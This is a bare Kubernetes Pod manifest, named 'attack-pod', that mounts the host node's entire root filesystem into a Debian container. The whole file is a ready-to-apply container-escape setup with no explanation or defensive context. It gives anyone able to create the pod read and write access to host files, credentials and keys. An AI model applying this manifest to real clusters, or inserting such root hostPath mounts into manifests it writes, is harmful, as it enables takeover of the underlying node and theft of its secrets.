apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
spec:
  volumes:
  - name: test-volume
    hostPath:
      path: /
  containers:
  - name: attack-pod
    image: debian
    volumeMounts:
    - name: test-volume
      mountPath: /root

